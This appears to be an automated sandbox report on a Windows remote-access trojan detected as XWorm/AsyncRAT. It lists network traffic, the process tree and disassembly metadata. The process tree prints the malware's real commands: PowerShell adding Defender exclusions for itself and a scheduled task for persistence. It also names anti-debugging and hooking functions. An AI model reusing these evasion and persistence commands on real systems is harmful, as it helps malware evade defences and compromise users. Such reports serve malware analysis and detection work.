                                              TimestampBytes transferredDirectionData
                                              Oct 9, 2024 23:04:08.106169939 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                              Host: ip-api.com
                                              Connection: Keep-Alive
                                              Oct 9, 2024 23:04:08.622498989 CEST175INHTTP/1.1 200 OK
                                              Date: Wed, 09 Oct 2024 21:04:07 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 6
                                              Access-Control-Allow-Origin: *
                                              X-Ttl: 53
                                              X-Rl: 43
                                              Data Raw: 66 61 6c 73 65 0a
                                              Data Ascii: false


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:17:04:03
                                              Start date:09/10/2024
                                              Path:C:\Users\user\Desktop\5q4X9fRo4b.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\5q4X9fRo4b.exe"
                                              Imagebase:0xd30000
                                              File size:42'496 bytes
                                              MD5 hash:9425780161C1CB105CD206D3F4FC6FA8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2502473225.0000000002F8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:8
                                              Start time:17:04:07
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe'
                                              Imagebase:0x230000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:17:04:07
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:17:04:13
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5q4X9fRo4b.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:17:04:13
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:17:04:23
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SystemUser32.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:17:04:23
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:17
                                              Start time:18:42:23
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser32.exe'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:18
                                              Start time:18:42:23
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:20
                                              Start time:18:42:43
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe"
                                              Imagebase:0x7ff621990000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:21
                                              Start time:18:42:43
                                              Start date:09/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:22
                                              Start time:18:42:43
                                              Start date:09/10/2024
                                              Path:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              Imagebase:0xcf0000
                                              File size:42'496 bytes
                                              MD5 hash:9425780161C1CB105CD206D3F4FC6FA8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: Joe Security
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 84%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:25
                                              Start time:18:42:55
                                              Start date:09/10/2024
                                              Path:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\SystemUser32.exe"
                                              Imagebase:0xb70000
                                              File size:42'496 bytes
                                              MD5 hash:9425780161C1CB105CD206D3F4FC6FA8
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:26
                                              Start time:18:43:01
                                              Start date:09/10/2024
                                              Path:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              Imagebase:0x600000
                                              File size:42'496 bytes
                                              MD5 hash:9425780161C1CB105CD206D3F4FC6FA8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:27
                                              Start time:18:43:04
                                              Start date:09/10/2024
                                              Path:C:\Users\user\AppData\Roaming\SystemUser32.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Roaming\SystemUser32.exe"
                                              Imagebase:0xae0000
                                              File size:42'496 bytes
                                              MD5 hash:9425780161C1CB105CD206D3F4FC6FA8
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:21%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:27.3%
                                                Total number of Nodes:11
                                                Total number of Limit Nodes:1
                                                execution_graph 6139 7ffaacce9798 6140 7ffaacce97a1 6139->6140 6141 7ffaacce9791 6140->6141 6142 7ffaacce9832 SetWindowsHookExW 6140->6142 6143 7ffaacce9871 6142->6143 6148 7ffaacce7631 6149 7ffaacce764f CheckRemoteDebuggerPresent 6148->6149 6151 7ffaacce76ef 6149->6151 6144 7ffaacce873d 6145 7ffaacce875d RtlSetProcessIsCritical 6144->6145 6147 7ffaacce9352 6145->6147

                                                Executed Functions

                                                Function 00007FFAACCEA310 Relevance: 2.4, Strings: 1, Instructions: 1135COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 127 7ffaaccea310-7ffaacced995 call 7ffaacce0640 135 7ffaacced997-7ffaacced9b4 127->135 136 7ffaacceda0b 127->136 137 7ffaacceda10-7ffaacceda25 135->137 139 7ffaacced9b6-7ffaacceda06 call 7ffaaccebae0 135->139 136->137 142 7ffaacceda27-7ffaacceda3e call 7ffaacce0870 call 7ffaacce0650 137->142 143 7ffaacceda43-7ffaacceda58 137->143 162 7ffaaccee64b-7ffaaccee659 139->162 142->162 148 7ffaacceda8f-7ffaaccedaa4 143->148 149 7ffaacceda5a-7ffaacceda8a call 7ffaacce0870 143->149 158 7ffaaccedaa6-7ffaaccedab2 call 7ffaaccea5b0 148->158 159 7ffaaccedab7-7ffaaccedacc 148->159 149->162 158->162 167 7ffaaccedb12-7ffaaccedb27 159->167 168 7ffaaccedace-7ffaaccedad1 159->168 174 7ffaaccedb68-7ffaaccedb7d 167->174 175 7ffaaccedb29-7ffaaccedb2c 167->175 168->136 170 7ffaaccedad7-7ffaaccedae2 168->170 170->136 173 7ffaaccedae8-7ffaaccedb0d call 7ffaacce0628 call 7ffaaccea5b0 170->173 173->162 182 7ffaaccedb7f-7ffaaccedb82 174->182 183 7ffaaccedbaa-7ffaaccedbbf 174->183 175->136 176 7ffaaccedb32-7ffaaccedb3d 175->176 176->136 179 7ffaaccedb43-7ffaaccedb63 call 7ffaacce0628 call 7ffaaccea360 176->179 179->162 182->136 185 7ffaaccedb88-7ffaaccedba5 call 7ffaacce0628 call 7ffaaccea368 182->185 192 7ffaaccedc97-7ffaaccedcac 183->192 193 7ffaaccedbc5-7ffaaccedc11 call 7ffaacce05b0 183->193 185->162 201 7ffaaccedcae-7ffaaccedcb1 192->201 202 7ffaaccedccb-7ffaaccedce0 192->202 193->136 226 7ffaaccedc17-7ffaaccedc4f call 7ffaacce7240 193->226 201->136 205 7ffaaccedcb7-7ffaaccedcc6 call 7ffaaccea340 201->205 210 7ffaaccedd02-7ffaaccedd17 202->210 211 7ffaaccedce2-7ffaaccedce5 202->211 205->162 217 7ffaaccedd19-7ffaaccedd32 210->217 218 7ffaaccedd37-7ffaaccedd4c 210->218 211->136 212 7ffaaccedceb-7ffaaccedcfd call 7ffaaccea340 211->212 212->162 217->162 223 7ffaaccedd4e-7ffaaccedd67 218->223 224 7ffaaccedd6c-7ffaaccedd81 218->224 223->162 229 7ffaaccedd83-7ffaaccedd9c 224->229 230 7ffaaccedda1-7ffaacceddb6 224->230 226->136 243 7ffaaccedc55-7ffaaccedc92 call 7ffaaccea5c0 226->243 229->162 235 7ffaacceddb8-7ffaacceddbb 230->235 236 7ffaaccedddf-7ffaacceddf4 230->236 235->136 239 7ffaacceddc1-7ffaacceddda 235->239 244 7ffaaccede94-7ffaaccede95 236->244 245 7ffaacceddfa-7ffaaccede49 236->245 239->162 243->162 247 7ffaaccede97-7ffaaccedea9 244->247 245->247 264 7ffaaccede4c-7ffaaccede72 245->264 253 7ffaaccedec1-7ffaacceded6 247->253 254 7ffaaccedeab-7ffaaccedebc 247->254 262 7ffaaccedf76-7ffaaccedf8b 253->262 263 7ffaaccededc-7ffaaccedf54 253->263 254->162 267 7ffaaccedfa3-7ffaaccedfb8 262->267 268 7ffaaccedf8d-7ffaaccedf9e 262->268 263->136 294 7ffaaccedf5a-7ffaaccedf71 263->294 264->136 275 7ffaaccede78-7ffaaccede8f 264->275 277 7ffaaccedfea-7ffaaccedfff 267->277 278 7ffaaccedfba-7ffaaccedfe5 call 7ffaacce0af0 call 7ffaaccebae0 267->278 268->162 275->162 284 7ffaaccee005-7ffaaccee0d7 call 7ffaacce0af0 call 7ffaaccebae0 277->284 285 7ffaaccee0dc-7ffaaccee0f1 277->285 278->162 284->162 292 7ffaaccee1b8-7ffaaccee1cd 285->292 293 7ffaaccee0f7-7ffaaccee0fa 285->293 303 7ffaaccee1e1-7ffaaccee1f6 292->303 304 7ffaaccee1cf-7ffaaccee1dc call 7ffaaccebae0 292->304 296 7ffaaccee100-7ffaaccee10b 293->296 297 7ffaaccee1ad-7ffaaccee1b2 293->297 294->162 296->297 299 7ffaaccee111-7ffaaccee1ab call 7ffaacce0af0 call 7ffaaccebae0 296->299 309 7ffaaccee1b3 297->309 299->309 313 7ffaaccee1f8-7ffaaccee209 303->313 314 7ffaaccee26d-7ffaaccee282 303->314 304->162 309->162 313->136 320 7ffaaccee20f-7ffaaccee21f call 7ffaacce0620 313->320 322 7ffaaccee284-7ffaaccee287 314->322 323 7ffaaccee2c2-7ffaaccee2d7 314->323 333 7ffaaccee221-7ffaaccee246 call 7ffaaccebae0 320->333 334 7ffaaccee24b-7ffaaccee268 call 7ffaacce0620 call 7ffaacce0628 call 7ffaaccea318 320->334 322->136 326 7ffaaccee28d-7ffaaccee2bd call 7ffaacce0618 call 7ffaacce0628 call 7ffaaccea318 322->326 331 7ffaaccee2d9-7ffaaccee2e3 call 7ffaacce8b00 323->331 332 7ffaaccee31d-7ffaaccee332 323->332 326->162 346 7ffaaccee2e8-7ffaaccee318 call 7ffaacceb7a8 call 7ffaaccea320 331->346 350 7ffaaccee338-7ffaaccee3cd call 7ffaacce0af0 call 7ffaaccebae0 332->350 351 7ffaaccee3d2-7ffaaccee3e7 332->351 333->162 334->162 346->162 350->162 351->162 369 7ffaaccee3ed-7ffaaccee3f4 351->369 372 7ffaaccee3f6-7ffaaccee400 call 7ffaaccea5d0 369->372 373 7ffaaccee407-7ffaaccee49a 369->373 372->373 393 7ffaaccee49b-7ffaaccee4ae call 7ffaaccea610 373->393 401 7ffaaccee4b0-7ffaaccee521 call 7ffaacce7f78 393->401 408 7ffaaccee592-7ffaaccee5a1 401->408 409 7ffaaccee523-7ffaaccee527 401->409 411 7ffaaccee5a8-7ffaaccee64a call 7ffaacce0af0 call 7ffaacce0630 call 7ffaaccebae0 408->411 409->411 412 7ffaaccee529-7ffaaccee5a1 call 7ffaaccea630 call 7ffaaccea640 409->412 411->162 412->411
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HK_H
                                                • API String ID: 0-1175406038
                                                • Opcode ID: e93803067d5eb53a59921fc39c82e5db74c6f31d3c8346dc16d406f67732b266
                                                • Instruction ID: 9cb0c7cbf0c83101ec01ee33846af89d3e7706cfa432314b862208b9b378cde1
                                                • Opcode Fuzzy Hash: e93803067d5eb53a59921fc39c82e5db74c6f31d3c8346dc16d406f67732b266
                                                • Instruction Fuzzy Hash: 3F728260B1D95A8BFB54FB78C456A79B2D2FF9A700F548578D01EC32C2DE28EC468781
                                                Function 00007FFAACCE155E Relevance: 1.8, Strings: 1, Instructions: 559COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L_H
                                                • API String ID: 0-1918747621
                                                • Opcode ID: fb579c2f24cb3a1934d7c9d80b83d01859bbfc820dd17a0731c070e99eb346f3
                                                • Instruction ID: bc4cee8ecdfb5a59447a76bdf0cbf069d9669e2934a2c6dd356c3723b58f513f
                                                • Opcode Fuzzy Hash: fb579c2f24cb3a1934d7c9d80b83d01859bbfc820dd17a0731c070e99eb346f3
                                                • Instruction Fuzzy Hash: E602A4A1B2CA498BF754EB3C8459AB9B7D2FF99300F5445B9D04EC3293DF68E8418781
                                                Function 00007FFAACCE7631 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 639 7ffaacce7631-7ffaacce76ed CheckRemoteDebuggerPresent 643 7ffaacce76f5-7ffaacce7738 639->643 644 7ffaacce76ef 639->644 644->643
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID: CheckDebuggerPresentRemote
                                                • String ID:
                                                • API String ID: 3662101638-0
                                                • Opcode ID: 3aa7d2c1c8d0d6b07e1508a3b6ac243d16c971487b1ae1e09e36e6b45c1c58d1
                                                • Instruction ID: dd4d157cb2ff80af406896f6cd4ac1701e527e5ee91df881ccd51f5ffe21fadb
                                                • Opcode Fuzzy Hash: 3aa7d2c1c8d0d6b07e1508a3b6ac243d16c971487b1ae1e09e36e6b45c1c58d1
                                                • Instruction Fuzzy Hash: F731007180875C8FDB58DF58C88ABE97BE0FF65321F04426AD489D7282DB34A8468B91
                                                Function 00007FFAACCE5C76 Relevance: .5, Instructions: 476COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 307cda94e3d357517f4f4d8135316a4cfab05c040281b1a415a795d5e2422ed9
                                                • Instruction ID: 9a8270781dc77449baee9abd484dbaca3495b2ab4ac0b597b3cfd9900198ea5c
                                                • Opcode Fuzzy Hash: 307cda94e3d357517f4f4d8135316a4cfab05c040281b1a415a795d5e2422ed9
                                                • Instruction Fuzzy Hash: 04F1A470919A8D8FEBA8DF28C8557E937E1FF55310F04826EE84DC7291CB7899458B81
                                                Function 00007FFAACCE6A22 Relevance: .5, Instructions: 462COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8fe94094190654911469081b53a317b4983bc37b1079cdb54b9385250da26df5
                                                • Instruction ID: bebb510237a647212bddc67472558b0f2957666322f1e34b1e2f0fab740e7566
                                                • Opcode Fuzzy Hash: 8fe94094190654911469081b53a317b4983bc37b1079cdb54b9385250da26df5
                                                • Instruction Fuzzy Hash: 90E1B270918A8D8FEBA8DF28C8557E977E1EF55310F04826ED84DC7291CF78A9448BC1
                                                Function 00007FFAACCE1F41 Relevance: .4, Instructions: 390COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fba2334ae772bb5e237b3b7aad39f0e6e88250b657093bf947844d4b63fcf40d
                                                • Instruction ID: a6ab9d6f19b21ab827f834afe630ed475796a6f4945b654f97372901629f5359
                                                • Opcode Fuzzy Hash: fba2334ae772bb5e237b3b7aad39f0e6e88250b657093bf947844d4b63fcf40d
                                                • Instruction Fuzzy Hash: 74C1A471B1DA4A8FFB98EB38845577976D2EF9A311F048179D04EC32D2EF28E8064781
                                                Function 00007FFAACCE1CA1 Relevance: .2, Instructions: 207COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0934c1dad2b1bfb31429fc0fd85c4e96e9f5f69e031a553caf21c4e2aa3ae177
                                                • Instruction ID: cd3c2c6d1865eaa87b903210e93414c2be5d6f80a2a77110dfe61d1b805c4d89
                                                • Opcode Fuzzy Hash: 0934c1dad2b1bfb31429fc0fd85c4e96e9f5f69e031a553caf21c4e2aa3ae177
                                                • Instruction Fuzzy Hash: 09512451A1E6C94FE786AB7888686757FD5DF87215B1804FBE0CDC7193DE1C5806C382
                                                Function 00007FFAACCE873D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 174COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID: CriticalProcess
                                                • String ID: K_^$K_^'
                                                • API String ID: 2695349919-4239086072
                                                • Opcode ID: 8f57ec8b287841839b096a9fe2e0f153e6d66bf99d8a740a83eb9d26b0ab4886
                                                • Instruction ID: 0ee5668d0009ed148600c5321be3dbcb6d939fe8bd021d322210020bc4d8e23c
                                                • Opcode Fuzzy Hash: 8f57ec8b287841839b096a9fe2e0f153e6d66bf99d8a740a83eb9d26b0ab4886
                                                • Instruction Fuzzy Hash: BF5124B290C6488FDB19DFACD8496E9BBF0EF62324F04416ED49AD3583DB34644AC785
                                                Function 00007FFAACCE9798 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID: HookWindows
                                                • String ID:
                                                • API String ID: 2559412058-0
                                                • Opcode ID: 97eb84713b2aed4ccfc61fe1c7a24bf6087df935fbed06ed39dd1a20313a512e
                                                • Instruction ID: 0d74c3fbcf1c9550a2cbe3bf3f3dd072dbc125c1282baab0dc2fd34cc96344df
                                                • Opcode Fuzzy Hash: 97eb84713b2aed4ccfc61fe1c7a24bf6087df935fbed06ed39dd1a20313a512e
                                                • Instruction Fuzzy Hash: B841D771A1CA498FEB58DF68D84A6F9BBE1EF96311F00427ED04DC3192CB65A81687C1

                                                Non-executed Functions

                                                Function 00007FFAACCE5779 Relevance: .4, Instructions: 416COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0171ade75cdbee5d47223fe2a54ec0f5f7e65cfb8d1f5dfb8081449ed8ba0a30
                                                • Instruction ID: dad848aa5808e1f4e6fb5bdd07a37d8b8ee887678d8a10f8176cb0daf847d8ce
                                                • Opcode Fuzzy Hash: 0171ade75cdbee5d47223fe2a54ec0f5f7e65cfb8d1f5dfb8081449ed8ba0a30
                                                • Instruction Fuzzy Hash: 6AD1C470918A8D8FEFA8DF28C8557E977D1FF56310F04826EE84DC7291CB7499458B82
                                                Function 00007FFAACCEE9B8 Relevance: .2, Instructions: 233COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2541963984.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacce0000_5q4X9fRo4b.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 870af9290ac69438cc1a2af05af0b489d993b3a683520c21c31a0d0d79656aee
                                                • Instruction ID: d68ac50b71ea409b2c3410586eef7916521d17c2e2c23cf5eb9df9ee25404604
                                                • Opcode Fuzzy Hash: 870af9290ac69438cc1a2af05af0b489d993b3a683520c21c31a0d0d79656aee
                                                • Instruction Fuzzy Hash: 9571F72154F7C58FE343A738D858AA57F91AF83365F0D81FEE099CA4A3CB99444AC742

                                                Executed Functions

                                                Function 00007FFAACD9660A Relevance: .4, Instructions: 427COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1344342404.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7ffaacd90000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae36699623a6f54ef2f5882db61555e175a2e16344c65649aa7e5a54c150057a
                                                • Instruction ID: 5492a97a22cd436f8c58aa09bfd6e4d01ca0cd1df7464fc6bae22fb488fc07ef
                                                • Opcode Fuzzy Hash: ae36699623a6f54ef2f5882db61555e175a2e16344c65649aa7e5a54c150057a
                                                • Instruction Fuzzy Hash: C6C18D79A0E68A8FF7A5EB6888155B5BBD0EF46310B0441FED46DC74C3E91DD80A83D1
                                                Function 00007FFAACD96633 Relevance: .3, Instructions: 262COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1344342404.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                Joe Sandbox IDA Plugin
